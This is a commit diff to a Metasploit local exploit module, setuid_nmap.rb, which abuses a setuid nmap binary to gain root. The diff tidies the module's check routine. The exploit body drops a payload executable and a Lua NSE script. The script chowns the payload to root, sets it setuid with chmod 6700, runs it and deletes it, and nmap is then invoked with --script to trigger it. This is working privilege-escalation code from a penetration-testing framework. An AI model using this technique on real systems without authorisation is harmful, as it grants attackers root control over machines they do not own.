Land #9446, Post API fix for setuid_nmap

modules/exploits/unix/local/setuid_nmap.rb

@@ -51,12 +51,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    stat = session.fs.file.stat(datastore["Nmap"])
-    if stat and stat.file? and stat.setuid?
-      vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
+    if setuid?(datastore['Nmap'])
+      vprint_good("#{datastore['Nmap']} is setuid")
       return CheckCode::Vulnerable
     end
-    return CheckCode::Safe
+    CheckCode::Safe
   end
 
   def exploit
@@ -69,16 +68,16 @@ class MetasploitModule < Msf::Exploit::Local
       write_file(exe_file, generate_payload_exe)
       evil_lua = %Q{
         os.execute("chown root:root #{exe_file}");
-        os.execute("chmod 6777 #{exe_file}");
+        os.execute("chmod 6700 #{exe_file}");
         os.execute("#{exe_file} &");
-        os.execute("rm #{exe_file}");
+        os.execute("rm -f #{exe_file}");
       }
     end
     lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
     print_status("Dropping lua #{lua_file}")
     write_file(lua_file, evil_lua)
 
-    print_status("running")
+    print_status("Running #{lua_file} with Nmap")
 
     scriptname = lua_file
     if (lua_file[0,1] == "/")
@@ -91,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
       # Versions before 4.75 (August 2008) will not run scripts without a port scan
       cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
     ensure
-      cmd_exec "rm -f #{lua_file} #{exe_file}"
+      rm_f(lua_file, exe_file)
     end
 
   end